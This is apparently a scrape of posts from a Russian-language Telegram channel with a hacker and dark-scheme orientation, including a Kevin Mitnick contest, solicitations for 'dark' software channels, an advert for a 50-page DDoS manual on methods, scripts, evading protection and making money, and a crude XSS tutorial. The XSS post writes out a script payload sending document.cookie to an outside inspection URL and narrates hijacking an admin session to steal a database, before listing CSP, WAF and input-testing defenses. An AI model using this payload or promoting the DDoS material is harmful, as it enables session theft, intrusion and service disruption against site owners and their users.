FG | MATRIX

😁Своими словами опишите, информацию из гугла не будем засчитывать.

👑Кто такой Кевин Митник? Опишите его навыки и историю личности боту. 🔤@FG_feedback_bot За самый креативный ответ мы предоставим возможность узнать новое из мира социальной инженерии. В пабликах вы такой информации никогда не найдёте. Игра началась 🤝

👀

🎇Сегодня итоги и апдейты. 🤝

Схемные каналы тоже подойдут. Так же мнение ваше по каналам опишите, насколько они норм. Неправильных ответов нет. Никто спортиков за плохой ответ отправлять не собирается 🤣 🤝 🪵

🤙Всем здорова, дайте хорошие каналы в бота. Софт дарк тематики. Задание дает +20 social credit для первого взноса на кошкажену. Если каналы действительно годные получите доп плюшки. 💬Сюда писать: @FG_feedback_bot

💀💀50cтраниц про ддос.💀💀 Мануал на достаточно трудном языке - нужно или перечитывать или гуглить, но все, что нужно тут есть. Много теории, настройки, скриптов. Много сказано про методы, софты и серваки, под конец неплохая инф про анонимность, заработок и обход защиты. Я даже пару раз хорошо поржал. ⚫️⚫️⚫️⚫️ ⚫️ ⚫️ ⚫️ https://t.me/FG_FAQ_FG/95 ⚫️ ⚫️ ⚫️⚫️⚫️⚫️⚫️⚫️⚫️ 💬 GANG CHAT \ ⚙️GUIDE ECOSYSTEM \ 🗂ADDLIST \ 🔥LVL 2 \

💥XSS ИЛИ КАК СПИЗДЕТЬ КУКИ АДМИНА Ну че вы? Как дела? Седня будем разбираться с ахуительной ошибкой которая есть у всех новичков и самоучек. Веб разработчики готовимся Не буду ебать вам мозг высерами из википедии объясню на простом примере: У нас есть Димон - фронтендер и дядя Миша - заказчик Дядя Миша говорит Димону: -Бля, захуяч ка мне панельку с отзывами, хочу знач чтоб клиенты могли писать что у меня лучший автосервис -Ok, boss Ну и естстественно димон делает всё наотъебись и идёт спать. И тут появляется Дартаньян, ахуенный хакер, решивший спиздеть бд дяди Миши. Заходит знач он на сайт и видит строку с отзывами. В следующую секунду там появляется вот такой вот текст: <script> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </script> Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу. Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице. В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией. Окей, а как избежать подобной хуйни? 👉Добавляем CSP header. Например: Content-Security-Policy: script-src 'self' Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/ 👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог)) 👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код: <script>alert('XSS');</script> Есть отстук? Знач нашли уязвимость. Пиздуем фиксить 👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ ) 💬 GANG CHAT \ ⚙️GUIDE ECOSYSTEM \ 🗂ADDLIST \ 🔥LVL 2 \